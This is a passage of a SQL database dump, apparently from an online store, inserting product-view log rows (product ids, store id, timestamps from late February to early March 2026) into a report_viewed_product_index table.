(26903, NULL, NULL, 2054, 1, '2026-02-28 17:20:08'),
(26904, NULL, NULL, 2058, 1, '2026-02-28 17:20:08'),
(26905, NULL, NULL, 2055, 1, '2026-02-28 17:20:09'),
(26906, NULL, NULL, 2054, 1, '2026-02-28 17:20:09'),
(26907, NULL, NULL, 2060, 1, '2026-02-28 17:20:09'),
(26908, NULL, NULL, 2059, 1, '2026-02-28 17:20:10'),
(26909, NULL, NULL, 2058, 1, '2026-02-28 17:20:11'),
(26910, NULL, NULL, 2060, 1, '2026-02-28 17:20:11'),
(26911, NULL, NULL, 2059, 1, '2026-02-28 17:20:11'),
(26912, NULL, NULL, 2058, 1, '2026-02-28 17:20:12'),
(26913, NULL, NULL, 2061, 1, '2026-02-28 17:22:27'),
(26914, NULL, NULL, 2062, 1, '2026-02-28 17:22:27'),
(26915, NULL, NULL, 2064, 1, '2026-02-28 17:22:27'),
(26916, NULL, NULL, 2064, 1, '2026-02-28 17:22:27'),
(26917, NULL, NULL, 2064, 1, '2026-02-28 17:22:27'),
(26918, NULL, NULL, 2063, 1, '2026-02-28 17:22:28'),
(26919, NULL, NULL, 2060, 1, '2026-02-28 17:22:28'),
(26920, NULL, NULL, 2059, 1, '2026-02-28 17:22:28'),
(26921, NULL, NULL, 2058, 1, '2026-02-28 17:22:29'),
(26922, NULL, NULL, 2055, 1, '2026-02-28 17:22:29'),
(26923, NULL, NULL, 2054, 1, '2026-02-28 17:22:30'),
(26924, NULL, NULL, 2058, 1, '2026-02-28 17:22:32'),
(26925, NULL, NULL, 2055, 1, '2026-02-28 17:22:33'),
(26926, NULL, NULL, 2054, 1, '2026-02-28 17:22:33'),
(26927, NULL, NULL, 2055, 1, '2026-02-28 17:22:35'),
(26928, NULL, NULL, 2058, 1, '2026-02-28 17:22:35'),
(26929, NULL, NULL, 2054, 1, '2026-02-28 17:22:36'),
(26930, NULL, NULL, 2058, 1, '2026-02-28 17:22:37'),
(26931, NULL, NULL, 2055, 1, '2026-02-28 17:22:38'),
(26932, NULL, NULL, 2054, 1, '2026-02-28 17:22:39'),
(26933, NULL, NULL, 2058, 1, '2026-02-28 17:22:40'),
(26934, NULL, NULL, 2055, 1, '2026-02-28 17:22:40'),
(26935, NULL, NULL, 2054, 1, '2026-02-28 17:22:41'),
(26936, NULL, NULL, 2058, 1, '2026-02-28 17:22:42'),
(26937, NULL, NULL, 2055, 1, '2026-02-28 17:22:43'),
(26938, NULL, NULL, 2054, 1, '2026-02-28 17:22:44'),
(26939, NULL, NULL, 2061, 1, '2026-02-28 17:27:52'),
(26940, NULL, NULL, 2058, 1, '2026-02-28 17:36:05'),
(26941, NULL, NULL, 2063, 1, '2026-02-28 17:44:56'),
(26942, NULL, NULL, 2055, 1, '2026-02-28 17:45:57'),
(26943, NULL, NULL, 2054, 1, '2026-02-28 17:56:59'),
(26944, NULL, NULL, 2053, 1, '2026-02-28 17:59:53'),
(26945, NULL, NULL, 2055, 1, '2026-02-28 18:01:00'),
(26946, NULL, NULL, 2058, 1, '2026-02-28 18:01:13'),
(26947, NULL, NULL, 2055, 1, '2026-02-28 18:25:15'),
(26948, NULL, NULL, 2061, 1, '2026-02-28 18:43:30'),
(26949, NULL, NULL, 2059, 1, '2026-02-28 18:49:03'),
(26950, NULL, NULL, 2062, 1, '2026-02-28 19:44:52'),
(26951, NULL, NULL, 2064, 1, '2026-03-01 00:15:24'),
(26952, NULL, NULL, 2060, 1, '2026-03-01 00:32:47'),
(26953, NULL, NULL, 2059, 1, '2026-03-01 00:34:11'),
(26954, NULL, NULL, 2061, 1, '2026-03-01 01:08:54'),
(26955, NULL, NULL, 2061, 1, '2026-03-01 01:09:51'),
(26956, NULL, NULL, 2061, 1, '2026-03-01 01:10:51'),
(26957, NULL, NULL, 2061, 1, '2026-03-01 01:11:55'),
(26958, NULL, NULL, 2061, 1, '2026-03-01 01:15:56'),
(26959, NULL, NULL, 2059, 1, '2026-03-01 01:22:32'),
(26960, NULL, NULL, 2053, 1, '2026-03-01 03:35:37'),
(26961, NULL, NULL, 2061, 1, '2026-03-01 03:50:31'),
(26962, NULL, NULL, 2060, 1, '2026-03-01 04:03:25'),
(26963, NULL, NULL, 2054, 1, '2026-03-01 04:19:14'),
(26964, NULL, NULL, 2060, 1, '2026-03-01 06:15:03'),
(26965, NULL, NULL, 2053, 1, '2026-03-01 08:13:32'),
(26966, NULL, NULL, 2053, 1, '2026-03-01 08:26:06'),
(26967, NULL, NULL, 2061, 1, '2026-03-01 09:09:30'),
(26968, NULL, NULL, 2062, 1, '2026-03-01 09:28:44'),
(26969, NULL, NULL, 2061, 1, '2026-03-01 09:36:49'),
(26970, NULL, NULL, 2060, 1, '2026-03-01 10:16:52'),
(26971, NULL, NULL, 2064, 1, '2026-03-01 11:26:55'),
(26972, NULL, NULL, 2064, 1, '2026-03-01 12:17:53'),
(26973, NULL, NULL, 2059, 1, '2026-03-01 13:53:28'),
(26974, NULL, NULL, 2061, 1, '2026-03-01 13:58:22'),
(26975, NULL, NULL, 2063, 1, '2026-03-01 16:40:02'),
(26976, NULL, NULL, 2062, 1, '2026-03-01 17:11:45'),
(26977, NULL, NULL, 2062, 1, '2026-03-01 17:12:14'),
(26978, NULL, NULL, 2063, 1, '2026-03-01 17:40:45'),
(26979, NULL, NULL, 2062, 1, '2026-03-01 19:25:25'),
(26980, NULL, NULL, 2063, 1, '2026-03-01 22:39:55'),
(26981, NULL, NULL, 2053, 1, '2026-03-01 23:26:35'),
(26982, NULL, NULL, 2060, 1, '2026-03-01 23:35:10'),
(26983, NULL, NULL, 2060, 1, '2026-03-02 00:20:14'),
(26984, NULL, NULL, 2060, 1, '2026-03-02 00:32:27'),
(26985, 7157, 127, 2064, 1, '2026-03-02 01:54:30'),
(26986, NULL, NULL, 2059, 1, '2026-03-02 02:57:08'),
(26987, NULL, NULL, 2053, 1, '2026-03-02 03:37:16'),
(26988, NULL, NULL, 2061, 1, '2026-03-02 03:51:42'),
(26989, NULL, NULL, 2061, 1, '2026-03-02 03:52:35'),
(26990, NULL, NULL, 2062, 1, '2026-03-02 04:17:25'),
(26991, NULL, NULL, 2061, 1, '2026-03-02 06:44:21'),
(26992, NULL, NULL, 2059, 1, '2026-03-02 10:16:58'),
(26993, NULL, NULL, 2061, 1, '2026-03-02 11:30:55'),
(26994, NULL, NULL, 2058, 1, '2026-03-02 12:52:39'),
(26995, NULL, NULL, 2058, 1, '2026-03-02 12:52:47'),
(26996, NULL, NULL, 2060, 1, '2026-03-02 12:56:11'),
(26997, NULL, NULL, 2060, 1, '2026-03-02 12:56:14'),
(26998, NULL, NULL, 2060, 1, '2026-03-02 13:20:22'),
(26999, NULL, NULL, 2060, 1, '2026-03-02 13:20:25'),
(27000, NULL, NULL, 2060, 1, '2026-03-02 13:30:59'),
(27001, NULL, NULL, 2058, 1, '2026-03-02 14:16:25'),
(27002, NULL, NULL, 2060, 1, '2026-03-02 14:17:44'),
(27003, NULL, NULL, 2055, 1, '2026-03-02 14:17:52'),
(27004, NULL, NULL, 2054, 1, '2026-03-02 14:17:53'),
(27005, NULL, NULL, 2060, 1, '2026-03-02 14:18:48'),
(27006, NULL, NULL, 2059, 1, '2026-03-02 14:29:32'),
(27007, NULL, NULL, 2061, 1, '2026-03-02 14:34:32'),
(27008, NULL, NULL, 2061, 1, '2026-03-02 14:39:06'),
(27009, NULL, NULL, 2062, 1, '2026-03-02 16:30:02'),
(27010, NULL, NULL, 2062, 1, '2026-03-02 16:30:35'),
(27011, NULL, NULL, 2053, 1, '2026-03-02 16:48:12'),
(27012, NULL, NULL, 2053, 1, '2026-03-02 17:13:09'),
(27013, NULL, NULL, 2054, 1, '2026-03-02 19:52:27'),
(27014, NULL, NULL, 2058, 1, '2026-03-02 19:52:30'),
(27015, NULL, NULL, 2062, 1, '2026-03-02 19:56:26'),
(27016, NULL, NULL, 2064, 1, '2026-03-02 20:38:09'),
(27017, NULL, NULL, 2060, 1, '2026-03-02 21:07:28'),
(27018, NULL, NULL, 2058, 1, '2026-03-02 21:47:32'),
(27019, NULL, NULL, 2063, 1, '2026-03-02 23:43:08'),
(27020, NULL, NULL, 2061, 1, '2026-03-03 04:59:16'),
(27021, NULL, NULL, 2060, 1, '2026-03-03 05:42:16'),
(27022, NULL, NULL, 2062, 1, '2026-03-03 06:56:00'),
(27023, NULL, NULL, 2062, 1, '2026-03-03 06:56:03'),
(27024, NULL, NULL, 2053, 1, '2026-03-03 07:11:33'),
(27025, NULL, NULL, 2059, 1, '2026-03-03 07:15:28'),
(27026, NULL, NULL, 2061, 1, '2026-03-03 09:22:44'),
(27027, NULL, NULL, 2060, 1, '2026-03-03 09:40:00'),
(27028, NULL, NULL, 2053, 1, '2026-03-03 10:08:01'),
(27029, NULL, NULL, 2060, 1, '2026-03-03 10:51:04'),
(27030, NULL, NULL, 2054, 1, '2026-03-03 10:53:19'),
(27031, NULL, NULL, 2063, 1, '2026-03-03 10:53:34'),
(27032, NULL, NULL, 2061, 1, '2026-03-03 10:57:03'),
(27033, NULL, NULL, 2055, 1, '2026-03-03 11:02:48'),
(27034, NULL, NULL, 2062, 1, '2026-03-03 11:05:39'),
(27035, NULL, NULL, 2059, 1, '2026-03-03 11:06:03'),
(27036, NULL, NULL, 2060, 1, '2026-03-03 11:42:42'),
(27037, NULL, NULL, 2064, 1, '2026-03-03 11:49:47'),
(27038, NULL, NULL, 2058, 1, '2026-03-03 12:20:54'),
(27039, NULL, NULL, 2053, 1, '2026-03-03 13:20:19'),
(27040, NULL, NULL, 2060, 1, '2026-03-03 13:46:08'),
(27041, NULL, NULL, 2062, 1, '2026-03-03 13:46:15'),
(27042, NULL, NULL, 2064, 1, '2026-03-03 13:54:15'),
(27043, NULL, NULL, 2059, 1, '2026-03-03 13:55:25'),
(27044, NULL, NULL, 2062, 1, '2026-03-03 13:55:43'),
(27045, NULL, NULL, 2063, 1, '2026-03-03 13:55:44'),
(27046, NULL, NULL, 2058, 1, '2026-03-03 13:56:33'),
(27047, NULL, NULL, 2055, 1, '2026-03-03 13:56:33'),
(27048, NULL, NULL, 2061, 1, '2026-03-03 13:56:38'),
(27049, NULL, NULL, 2054, 1, '2026-03-03 13:57:05'),
(27050, NULL, NULL, 2060, 1, '2026-03-03 13:57:50'),
(27051, NULL, NULL, 2054, 1, '2026-03-03 14:17:07'),
(27052, NULL, NULL, 2060, 1, '2026-03-03 14:17:11'),
(27053, NULL, NULL, 2060, 1, '2026-03-03 14:17:12'),
(27054, NULL, NULL, 2058, 1, '2026-03-03 14:17:26'),
(27055, NULL, NULL, 2055, 1, '2026-03-03 14:19:56'),
(27056, NULL, NULL, 2061, 1, '2026-03-03 15:04:17'),
(27057, NULL, NULL, 2055, 1, '2026-03-03 15:08:45'),
(27058, NULL, NULL, 2059, 1, '2026-03-03 15:08:46'),
(27059, NULL, NULL, 2060, 1, '2026-03-03 15:11:20'),
(27060, NULL, NULL, 2053, 1, '2026-03-03 16:11:54'),
(27061, NULL, NULL, 2062, 1, '2026-03-03 16:31:19'),
(27062, NULL, NULL, 2062, 1, '2026-03-03 16:31:44'),
(27063, NULL, NULL, 2062, 1, '2026-03-03 17:08:47'),
(27064, NULL, NULL, 2062, 1, '2026-03-03 20:51:13'),
(27065, NULL, NULL, 2063, 1, '2026-03-03 21:53:18'),
(27066, NULL, NULL, 2055, 1, '2026-03-03 22:11:43'),
(27067, NULL, NULL, 2053, 1, '2026-03-03 23:44:02'),
(27068, NULL, NULL, 2061, 1, '2026-03-04 00:42:53'),
(27069, NULL, NULL, 2060, 1, '2026-03-04 06:05:51'),
(27070, NULL, NULL, 2064, 1, '2026-03-04 09:05:49'),
(27071, NULL, NULL, 2054, 1, '2026-03-04 11:02:04'),
(27072, NULL, NULL, 2061, 1, '2026-03-04 12:27:16'),
(27073, NULL, NULL, 2053, 1, '2026-03-04 12:31:20'),
(27074, NULL, NULL, 2060, 1, '2026-03-04 14:17:08'),
(27075, NULL, NULL, 2060, 1, '2026-03-04 14:17:29'),
(27076, NULL, NULL, 2054, 1, '2026-03-04 14:18:26'),
(27077, NULL, NULL, 2055, 1, '2026-03-04 14:18:28'),
(27078, NULL, NULL, 2058, 1, '2026-03-04 14:19:37'),
(27079, NULL, NULL, 2055, 1, '2026-03-04 14:52:50'),
(27080, NULL, NULL, 2060, 1, '2026-03-04 15:10:47'),
(27081, NULL, NULL, 2060, 1, '2026-03-04 15:10:50'),
(27082, NULL, NULL, 2061, 1, '2026-03-04 15:11:43'),
(27083, NULL, NULL, 2060, 1, '2026-03-04 15:41:52'),
(27084, NULL, NULL, 2060, 1, '2026-03-04 15:41:54'),
(27085, NULL, NULL, 2060, 1, '2026-03-04 16:23:35'),
(27086, NULL, NULL, 2062, 1, '2026-03-04 16:52:52'),
(27087, NULL, NULL, 2062, 1, '2026-03-04 16:53:17'),
(27088, NULL, NULL, 2059, 1, '2026-03-04 17:40:51'),
(27089, NULL, NULL, 2060, 1, '2026-03-04 17:41:18'),
(27090, NULL, NULL, 2060, 1, '2026-03-04 19:16:41'),
(27091, NULL, NULL, 2060, 1, '2026-03-04 19:56:26'),
(27092, NULL, NULL, 2055, 1, '2026-03-04 20:44:12'),
(27093, NULL, NULL, 2058, 1, '2026-03-04 21:11:44'),
(27094, NULL, NULL, 2061, 1, '2026-03-04 23:33:29'),
(27095, NULL, NULL, 2060, 1, '2026-03-05 01:43:54'),
(27096, NULL, NULL, 2061, 1, '2026-03-05 02:37:44'),
(27097, NULL, NULL, 2061, 1, '2026-03-05 03:33:08'),
(27098, NULL, NULL, 2053, 1, '2026-03-05 03:34:43'),
(27099, NULL, NULL, 2058, 1, '2026-03-05 03:57:07'),
(27100, NULL, NULL, 2064, 1, '2026-03-05 04:37:31'),
(27101, NULL, NULL, 2055, 1, '2026-03-05 05:01:14'),
(27102, NULL, NULL, 2060, 1, '2026-03-05 05:16:58'),
(27103, NULL, NULL, 2053, 1, '2026-03-05 06:00:34'),
(27104, NULL, NULL, 2064, 1, '2026-03-05 10:56:29'),
(27105, NULL, NULL, 2059, 1, '2026-03-05 10:56:35'),
(27106, NULL, NULL, 2063, 1, '2026-03-05 10:56:54'),
(27107, NULL, NULL, 2060, 1, '2026-03-05 10:57:00'),
(27108, NULL, NULL, 2060, 1, '2026-03-05 14:16:23'),
(27109, NULL, NULL, 2054, 1, '2026-03-05 14:17:40'),
(27110, NULL, NULL, 2060, 1, '2026-03-05 14:18:48'),
(27111, NULL, NULL, 2055, 1, '2026-03-05 14:20:25'),
(27112, NULL, NULL, 2058, 1, '2026-03-05 14:21:20'),
(27113, NULL, NULL, 2053, 1, '2026-03-05 15:32:38'),
(27114, NULL, NULL, 2061, 1, '2026-03-05 16:03:39'),
(27115, NULL, NULL, 2053, 1, '2026-03-05 16:24:03'),
(27116, NULL, NULL, 2062, 1, '2026-03-05 16:51:18'),
(27117, NULL, NULL, 2062, 1, '2026-03-05 16:51:37'),
(27118, NULL, NULL, 2053, 1, '2026-03-05 16:53:45'),
(27119, NULL, NULL, 2060, 1, '2026-03-05 19:46:40'),
(27120, NULL, NULL, 2058, 1, '2026-03-05 20:21:41'),
(27121, NULL, NULL, 2060, 1, '2026-03-05 20:27:21'),
(27122, NULL, NULL, 2062, 1, '2026-03-05 20:33:37'),
(27123, NULL, NULL, 2063, 1, '2026-03-05 20:39:17'),
(27124, NULL, NULL, 2060, 1, '2026-03-05 22:22:46'),
(27125, NULL, NULL, 2060, 1, '2026-03-05 22:36:31'),
(27126, NULL, NULL, 2053, 1, '2026-03-06 02:06:27'),
(27127, NULL, NULL, 2061, 1, '2026-03-06 02:12:41'),
(27128, NULL, NULL, 2059, 1, '2026-03-06 03:42:33'),
(27129, NULL, NULL, 2061, 1, '2026-03-06 05:46:16'),
(27130, NULL, NULL, 2063, 1, '2026-03-06 05:46:58'),
(27131, NULL, NULL, 2061, 1, '2026-03-06 06:16:13'),
(27132, NULL, NULL, 2060, 1, '2026-03-06 07:31:53'),
(27133, NULL, NULL, 2064, 1, '2026-03-06 07:57:49'),
(27134, NULL, NULL, 2053, 1, '2026-03-06 08:33:35'),
(27135, NULL, NULL, 2055, 1, '2026-03-06 11:41:18'),
(27136, NULL, NULL, 2060, 1, '2026-03-06 12:40:54'),
(27137, NULL, NULL, 2060, 1, '2026-03-06 12:46:45'),
(27138, NULL, NULL, 2063, 1, '2026-03-06 13:10:50'),
(27139, NULL, NULL, 2054, 1, '2026-03-06 13:42:01'),
(27140, NULL, NULL, 2058, 1, '2026-03-06 14:18:26'),
(27141, NULL, NULL, 2054, 1, '2026-03-06 14:18:27'),
(27142, NULL, NULL, 2055, 1, '2026-03-06 14:20:00'),
(27143, NULL, NULL, 2060, 1, '2026-03-06 14:20:26'),
(27144, NULL, NULL, 2060, 1, '2026-03-06 14:22:00'),
(27145, NULL, NULL, 2063, 1, '2026-03-06 14:31:58'),
(27146, NULL, NULL, 2061, 1, '2026-03-06 15:46:55'),
(27147, NULL, NULL, 2061, 1, '2026-03-06 16:09:55'),
(27148, NULL, NULL, 2062, 1, '2026-03-06 16:22:09'),
(27149, NULL, NULL, 2062, 1, '2026-03-06 16:22:52'),
(27150, NULL, NULL, 2061, 1, '2026-03-06 16:32:43'),
(27151, NULL, NULL, 2062, 1, '2026-03-06 16:47:56'),
(27152, NULL, NULL, 2062, 1, '2026-03-06 16:48:39'),
(27153, NULL, NULL, 2054, 1, '2026-03-06 17:03:13'),
(27154, NULL, NULL, 2061, 1, '2026-03-06 17:21:36'),
(27155, NULL, NULL, 2061, 1, '2026-03-06 17:22:46'),
(27156, NULL, NULL, 2061, 1, '2026-03-06 17:43:24'),
(27157, NULL, NULL, 2053, 1, '2026-03-06 18:27:33'),
(27158, NULL, NULL, 2054, 1, '2026-03-06 22:08:18'),
(27159, NULL, NULL, 2063, 1, '2026-03-06 22:39:46'),
(27160, NULL, NULL, 2061, 1, '2026-03-06 22:39:50'),
(27161, NULL, NULL, 2062, 1, '2026-03-06 22:39:58'),
(27162, NULL, NULL, 2061, 1, '2026-03-07 01:20:54'),
(27163, NULL, NULL, 2053, 1, '2026-03-07 01:43:18'),
(27164, NULL, NULL, 2064, 1, '2026-03-07 02:16:03'),
(27165, NULL, NULL, 2063, 1, '2026-03-07 02:26:22'),
(27166, NULL, NULL, 2063, 1, '2026-03-07 03:25:25'),
(27167, NULL, NULL, 2061, 1, '2026-03-07 06:01:10'),
(27168, NULL, NULL, 2053, 1, '2026-03-07 06:10:20'),
(27169, NULL, NULL, 2059, 1, '2026-03-07 06:50:25'),
(27170, NULL, NULL, 2060, 1, '2026-03-07 06:50:29'),
(27171, NULL, NULL, 2058, 1, '2026-03-07 08:41:33'),
(27172, NULL, NULL, 2053, 1, '2026-03-07 08:41:37'),
(27173, NULL, NULL, 2060, 1, '2026-03-07 08:53:16'),
(27174, NULL, NULL, 2058, 1, '2026-03-07 09:28:18'),
(27175, NULL, NULL, 2053, 1, '2026-03-07 11:05:45'),
(27176, NULL, NULL, 2060, 1, '2026-03-07 11:30:27'),
(27177, NULL, NULL, 2060, 1, '2026-03-07 14:03:40'),
(27178, NULL, NULL, 2060, 1, '2026-03-07 14:03:44'),
(27179, NULL, NULL, 2061, 1, '2026-03-07 14:15:09'),
(27180, NULL, NULL, 2062, 1, '2026-03-07 14:18:21'),
(27181, NULL, NULL, 2058, 1, '2026-03-07 14:22:16'),
(27182, NULL, NULL, 2055, 1, '2026-03-07 14:22:19'),
(27183, NULL, NULL, 2054, 1, '2026-03-07 14:25:37'),
(27184, NULL, NULL, 2060, 1, '2026-03-07 14:25:50'),
(27185, NULL, NULL, 2060, 1, '2026-03-07 14:25:51'),
(27186, NULL, NULL, 2060, 1, '2026-03-07 14:58:17'),
(27187, NULL, NULL, 2060, 1, '2026-03-07 14:58:19'),
(27188, NULL, NULL, 2062, 1, '2026-03-07 16:22:32'),
(27189, NULL, NULL, 2062, 1, '2026-03-07 16:23:16'),
(27190, NULL, NULL, 2053, 1, '2026-03-07 17:30:14'),
(27191, NULL, NULL, 2061, 1, '2026-03-07 18:09:56'),
(27192, NULL, NULL, 2058, 1, '2026-03-07 18:17:44'),
(27193, NULL, NULL, 2055, 1, '2026-03-07 18:27:07'),
(27194, NULL, NULL, 2054, 1, '2026-03-07 18:39:01'),
(27195, NULL, NULL, 2054, 1, '2026-03-07 19:38:57'),
(27196, NULL, NULL, 2060, 1, '2026-03-07 20:45:42'),
(27197, NULL, NULL, 2064, 1, '2026-03-07 22:08:12'),
(27198, NULL, NULL, 2061, 1, '2026-03-07 22:47:55'),
(27199, NULL, NULL, 2061, 1, '2026-03-07 23:09:40'),
(27200, NULL, NULL, 2060, 1, '2026-03-07 23:33:19'),
(27201, NULL, NULL, 2053, 1, '2026-03-07 23:48:43'),
(27202, NULL, NULL, 2064, 1, '2026-03-08 00:25:14'),
(27203, NULL, NULL, 2058, 1, '2026-03-08 00:51:11'),
(27204, NULL, NULL, 2061, 1, '2026-03-08 00:57:03'),
(27205, NULL, NULL, 2064, 1, '2026-03-08 00:59:11'),
(27206, NULL, NULL, 2054, 1, '2026-03-08 01:03:49'),
(27207, NULL, NULL, 2059, 1, '2026-03-08 01:27:54'),
(27208, NULL, NULL, 2062, 1, '2026-03-08 01:48:00'),
(27209, NULL, NULL, 2059, 1, '2026-03-08 02:04:06'),
(27210, NULL, NULL, 2055, 1, '2026-03-08 02:08:59'),
(27211, NULL, NULL, 2059, 1, '2026-03-08 02:18:01'),
(27212, NULL, NULL, 2062, 1, '2026-03-08 02:20:08'),
(27213, NULL, NULL, 2061, 1, '2026-03-08 09:14:53'),
(27214, NULL, NULL, 2060, 1, '2026-03-08 09:18:44'),
(27215, NULL, NULL, 2064, 1, '2026-03-08 09:27:24'),
(27216, NULL, NULL, 2064, 1, '2026-03-08 09:27:34'),
(27217, NULL, NULL, 2060, 1, '2026-03-08 09:42:02'),
(27218, NULL, NULL, 2053, 1, '2026-03-08 13:50:04'),
(27219, NULL, NULL, 2060, 1, '2026-03-08 14:08:32'),
(27220, NULL, NULL, 2060, 1, '2026-03-08 14:17:36'),
(27221, NULL, NULL, 2054, 1, '2026-03-08 14:18:03'),
(27222, NULL, NULL, 2062, 1, '2026-03-08 14:18:14'),
(27223, NULL, NULL, 2058, 1, '2026-03-08 14:19:31'),
(27224, NULL, NULL, 2055, 1, '2026-03-08 14:19:35'),
(27225, NULL, NULL, 2061, 1, '2026-03-08 14:20:29'),
(27226, NULL, NULL, 2060, 1, '2026-03-08 14:20:40'),
(27227, NULL, NULL, 2059, 1, '2026-03-08 14:53:37'),
(27228, NULL, NULL, 2059, 1, '2026-03-08 14:55:37'),
(27229, NULL, NULL, 2053, 1, '2026-03-08 15:20:26'),
(27230, NULL, NULL, 2053, 1, '2026-03-08 15:35:01'),
(27231, NULL, NULL, 2063, 1, '2026-03-08 16:42:13'),
(27232, NULL, NULL, 2058, 1, '2026-03-08 17:00:24'),
(27233, NULL, NULL, 2061, 1, '2026-03-08 17:02:42'),
(27234, NULL, NULL, 2061, 1, '2026-03-08 17:16:04'),
(27235, NULL, NULL, 2061, 1, '2026-03-08 17:16:45'),
(27236, NULL, NULL, 2061, 1, '2026-03-08 17:17:24'),
(27237, NULL, NULL, 2061, 1, '2026-03-08 17:17:56'),
(27238, NULL, NULL, 2061, 1, '2026-03-08 17:18:45'),
(27239, NULL, NULL, 2062, 1, '2026-03-08 18:04:42'),
(27240, NULL, NULL, 2062, 1, '2026-03-08 18:05:38'),
(27241, NULL, NULL, 2064, 1, '2026-03-08 21:57:18'),
(27242, NULL, NULL, 2064, 1, '2026-03-08 21:57:18'),
(27243, NULL, NULL, 2064, 1, '2026-03-08 21:57:18'),
(27244, NULL, NULL, 2063, 1, '2026-03-08 21:57:19'),
(27245, NULL, NULL, 2062, 1, '2026-03-08 21:57:19'),
(27246, NULL, NULL, 2061, 1, '2026-03-08 21:57:19'),
(27247, NULL, NULL, 2060, 1, '2026-03-08 21:57:19'),
(27248, NULL, NULL, 2059, 1, '2026-03-08 21:57:19'),
(27249, NULL, NULL, 2058, 1, '2026-03-08 21:57:22'),
(27250, NULL, NULL, 2064, 1, '2026-03-08 21:57:22'),
(27251, NULL, NULL, 2064, 1, '2026-03-08 21:57:22'),
(27252, NULL, NULL, 2063, 1, '2026-03-08 21:57:23'),
(27253, NULL, NULL, 2062, 1, '2026-03-08 21:57:23');
INSERT INTO `report_viewed_product_index` (`index_id`, `visitor_id`, `customer_id`, `product_id`, `store_id`, `added_at`) VALUES
(27254, NULL, NULL, 2061, 1, '2026-03-08 21:57:23'),
(27255, NULL, NULL, 2060, 1, '2026-03-08 21:57:24'),
(27256, NULL, NULL, 2059, 1, '2026-03-08 21:57:24'),
(27257, NULL, NULL, 2064, 1, '2026-03-08 21:57:25'),
(27258, NULL, NULL, 2055, 1, '2026-03-08 21:57:26'),
(27259, NULL, NULL, 2063, 1, '2026-03-08 21:57:26'),
(27260, NULL, NULL, 2064, 1, '2026-03-08 21:57:26'),
(27261, NULL, NULL, 2060, 1, '2026-03-08 21:57:26'),
(27262, NULL, NULL, 2062, 1, '2026-03-08 21:57:26'),
(27263, NULL, NULL, 2059, 1, '2026-03-08 21:57:26'),
(27264, NULL, NULL, 2061, 1, '2026-03-08 21:57:26'),
(27265, NULL, NULL, 2058, 1, '2026-03-08 21:57:27'),
(27266, NULL, NULL, 2058, 1, '2026-03-08 21:57:28'),
(27267, NULL, NULL, 2064, 1, '2026-03-08 21:57:28'),
(27268, NULL, NULL, 2055, 1, '2026-03-08 21:57:28'),
(27269, NULL, NULL, 2064, 1, '2026-03-08 21:57:29'),
(27270, NULL, NULL, 2062, 1, '2026-03-08 21:57:29'),
(27271, NULL, NULL, 2063, 1, '2026-03-08 21:57:29'),
(27272, NULL, NULL, 2060, 1, '2026-03-08 21:57:29'),
(27273, NULL, NULL, 2061, 1, '2026-03-08 21:57:29'),
(27274, NULL, NULL, 2059, 1, '2026-03-08 21:57:29'),
(27275, NULL, NULL, 2064, 1, '2026-03-08 21:57:31'),
(27276, NULL, NULL, 2055, 1, '2026-03-08 21:57:31'),
(27277, NULL, NULL, 2064, 1, '2026-03-08 21:57:31'),
(27278, NULL, NULL, 2060, 1, '2026-03-08 21:57:31'),
(27279, NULL, NULL, 2063, 1, '2026-03-08 21:57:31'),
(27280, NULL, NULL, 2062, 1, '2026-03-08 21:57:31'),
(27281, NULL, NULL, 2061, 1, '2026-03-08 21:57:32'),
(27282, NULL, NULL, 2059, 1, '2026-03-08 21:57:32'),
(27283, NULL, NULL, 2058, 1, '2026-03-08 21:57:34'),
(27284, NULL, NULL, 2064, 1, '2026-03-08 21:57:34'),
(27285, NULL, NULL, 2055, 1, '2026-03-08 21:57:34'),
(27286, NULL, NULL, 2058, 1, '2026-03-08 21:57:34'),
(27287, NULL, NULL, 2064, 1, '2026-03-08 21:57:34'),
(27288, NULL, NULL, 2063, 1, '2026-03-08 21:57:34'),
(27289, NULL, NULL, 2061, 1, '2026-03-08 21:57:35'),
(27290, NULL, NULL, 2062, 1, '2026-03-08 21:57:35'),
(27291, NULL, NULL, 2060, 1, '2026-03-08 21:57:36'),
(27292, NULL, NULL, 2059, 1, '2026-03-08 21:57:36'),
(27293, NULL, NULL, 2055, 1, '2026-03-08 21:57:36'),
(27294, NULL, NULL, 2054, 1, '2026-03-08 21:57:37'),
(27295, NULL, NULL, 2058, 1, '2026-03-08 21:57:38'),
(27296, NULL, NULL, 2055, 1, '2026-03-08 21:57:38'),
(27297, NULL, NULL, 2054, 1, '2026-03-08 21:57:39'),
(27298, NULL, NULL, 2054, 1, '2026-03-08 21:57:39'),
(27299, NULL, NULL, 2063, 1, '2026-03-08 21:59:43'),
(27300, NULL, NULL, 2064, 1, '2026-03-08 21:59:43'),
(27301, NULL, NULL, 2064, 1, '2026-03-08 21:59:43'),
(27302, NULL, NULL, 2061, 1, '2026-03-08 21:59:43'),
(27303, NULL, NULL, 2062, 1, '2026-03-08 21:59:43'),
(27304, NULL, NULL, 2064, 1, '2026-03-08 21:59:43'),
(27305, NULL, NULL, 2060, 1, '2026-03-08 21:59:45'),
(27306, NULL, NULL, 2058, 1, '2026-03-08 21:59:45'),
(27307, NULL, NULL, 2059, 1, '2026-03-08 21:59:45'),
(27308, NULL, NULL, 2055, 1, '2026-03-08 21:59:45'),
(27309, NULL, NULL, 2064, 1, '2026-03-08 21:59:48'),
(27310, NULL, NULL, 2054, 1, '2026-03-08 21:59:48'),
(27311, NULL, NULL, 2064, 1, '2026-03-08 21:59:48'),
(27312, NULL, NULL, 2064, 1, '2026-03-08 21:59:49'),
(27313, NULL, NULL, 2064, 1, '2026-03-08 21:59:49'),
(27314, NULL, NULL, 2054, 1, '2026-03-08 21:59:50'),
(27315, NULL, NULL, 2064, 1, '2026-03-08 23:21:02'),
(27316, NULL, NULL, 2063, 1, '2026-03-08 23:23:50'),
(27317, NULL, NULL, 2060, 1, '2026-03-09 01:06:41'),
(27318, NULL, NULL, 2061, 1, '2026-03-09 02:05:07'),
(27319, NULL, NULL, 2053, 1, '2026-03-09 03:30:53'),
(27320, NULL, NULL, 2060, 1, '2026-03-09 03:37:53'),
(27321, NULL, NULL, 2063, 1, '2026-03-09 04:00:10'),
(27322, NULL, NULL, 2064, 1, '2026-03-09 04:02:19'),
(27323, NULL, NULL, 2059, 1, '2026-03-09 04:02:24'),
(27324, NULL, NULL, 2054, 1, '2026-03-09 04:04:38'),
(27325, NULL, NULL, 2061, 1, '2026-03-09 04:04:58'),
(27326, NULL, NULL, 2060, 1, '2026-03-09 04:05:10'),
(27327, NULL, NULL, 2055, 1, '2026-03-09 04:08:56'),
(27328, NULL, NULL, 2062, 1, '2026-03-09 04:14:31'),
